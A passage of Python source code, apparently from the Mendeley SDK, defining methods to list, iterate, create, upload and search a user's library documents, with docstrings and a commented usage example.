Retrieves documents, as a paginated collection.
:param page_size: the number of documents to return on each page. Defaults to 20.
:param view: the view to get. One of 'bib', 'client', 'tags', 'all'.
:param sort: if specified, sorts documents by the specified field. One of 'created', 'last_modified', 'title'.
:param order: if specified in conjunction with 'sort', specifies the sort order. One of 'asc', 'desc'.
:param modified_since: if specified, only returns files modified after this timestamp.
:param deleted_since: if specified, only returns the IDs of documents deleted after this timestamp.
:return: a :class:`Page <mendeley.pagination.Page>` of
:class:`UserDocuments <mendeley.models.documents.UserDocument>`.
"""
return super(Documents, self).list(page_size, view, sort, order, modified_since, deleted_since, marker, folder_id, tag, page)
def iter(self, page_size=None, view=None, sort=None, order=None, modified_since=None, deleted_since=None, folder_id=None, tag=None):
"""
Retrieves documents, as an iterator.
:param page_size: the number of documents to retrieve at a time. Defaults to 20.
:param view: the view to get. One of 'bib', 'client', 'tags', 'all'.
:param sort: if specified, sorts documents by the specified field. One of 'created', 'last_modified', 'title'.
:param order: if specified in conjunction with 'sort', specifies the sort order. One of 'asc', 'desc'.
:param modified_since: if specified, only returns files modified after this timestamp.
:param deleted_since: if specified, only returns the IDs of documents deleted after this timestamp.
:return: an iterator of :class:`UserDocuments <mendeley.models.documents.UserDocument>`.
"""
return super(Documents, self).iter(page_size, view, sort, order, modified_since, deleted_since, folder_id, tag)
def create(self, title, type, **kwargs):
"""
Creates a new document from metadata.
:param title: title of the document.
:param type: type of the document.
:param kwargs: other properties of the document. These can be any of the attributes on
:class:`UserDocument <mendeley.models.documents.UserDocument>` or any of its views.
:return: a :class:`UserDocument <mendeley.models.documents.UserDocument>`.
"""
kwargs['title'] = title
kwargs['type'] = type
kwargs['group_id'] = self.group_id
kwargs = format_args(kwargs)
content_type = UserDocument.content_type
rsp = self.session.post(self._url, data=json.dumps(kwargs), headers={
'Accept': content_type,
'Content-Type': content_type
})
return UserAllDocument(self.session, rsp.json())
def create_from_file(self, path):
"""
Creates a new document from a file.
:param path: path to the file.
:return: a :class:`UserDocument <mendeley.models.documents.UserDocument>`.
"""
filename = basename(path)
headers = {
'content-disposition': 'attachment; filename=%s' % filename,
'content-type': guess_type(filename)[0],
'accept': UserDocument.content_type
}
with open(path, 'rb') as f:
rsp = self.session.post('/documents', data=f, headers=headers)
return UserAllDocument(self.session, rsp.json())
def search(self, query, view=None, marker=None):
"""
Searches the logged-in user's library for documents.
:param query: the search query to execute.
:param view: the view to get. One of 'bib', 'client', 'tags', 'all'.
:return: a :class:`DocumentsSearch <mendeley.resources.documents.DocumentsSearch>` resource, from which results
can be retrieved.
"""
if self.group_id:
raise MendeleyException('Search is not available for group documents')
return DocumentsSearch(self.session, query=query, view=view, marker=marker)
def advanced_search(self, title=None, author=None, source=None, abstract=None, tag=None, type=None, min_year=None, max_year=None,
view=None, page=None):
"""
Executes an advanced search in the logged-in user's library, where individual fields can be searched on.
:param title: Title.
:param author: Author.
:param source: Source.
:param abstract: Abstract.
        :param tag: Tag.
        :param type: Document type.
:param min_year: Minimum year for documents to return.
:param max_year: Maximum year for documents to return.
:param view: the view to get. One of 'bib', 'client', 'tags', 'all'.
:return: a :class:`DocumentsSearch <mendeley.resources.documents.DocumentsSearch>` resource, from which results
can be retrieved.
"""
if self.group_id:
raise MendeleyException('Search is not available for group documents')
return DocumentsSearch(self.session, title=title, author=author, source=source, abstract=abstract,
                               tag=tag, type=type, min_year=min_year, max_year=max_year, view=view, page=page)
@staticmethod
def view_type(view):
return {
'all': UserAllDocument,
'bib': UserBibDocument,
'client': UserClientDocument,
'tags': UserTagsDocument,
'core': UserDocument,
}.get(view, UserDocument)
class DocumentsSearch(ListResource):
"""
Resource for accessing the results of a catalog search.
"""
def __init__(self, session, **kwargs):
self.session = session
self.params = kwargs
def list(self, page_size=None, **kwargs):
"""
Retrieves search results, as a paginated collection.
:param page_size: the number of search results to return on each page. Defaults to 20.
:return: a :class:`Page <mendeley.pagination.Page>` of
:class:`CatalogDocuments <mendeley.models.catalog.CatalogDocument>`.
"""
return super(DocumentsSearch, self).list(page_size, **kwargs)
def iter(self, page_size=None):
"""
Retrieves search results, as an iterator.
:param page_size: the number of search results to retrieve at a time. Defaults to 20.
:return: an iterator of :class:`CatalogDocuments <mendeley.models.catalog.CatalogDocument>`.
"""
return super(DocumentsSearch, self).iter(page_size)
def _obj_type(self, **kwargs):
return Documents.view_type(self.params['view'])
@property
def _url(self):
return add_query_params('/search/documents', self.params)
@property
def _session(self):
return self.session
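# Usage sketch (illustrative, not part of the SDK; assumes an authenticated
# MendeleySession available as `session`):
#
#     doc = session.documents.create('A title', 'journal', year=2020)
#     for d in session.documents.iter(view='bib', sort='created', order='desc'):
#         print(d.title)
#
#     results = session.documents.search('machine learning', view='all')
#     first_page = results.list(page_size=20)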
|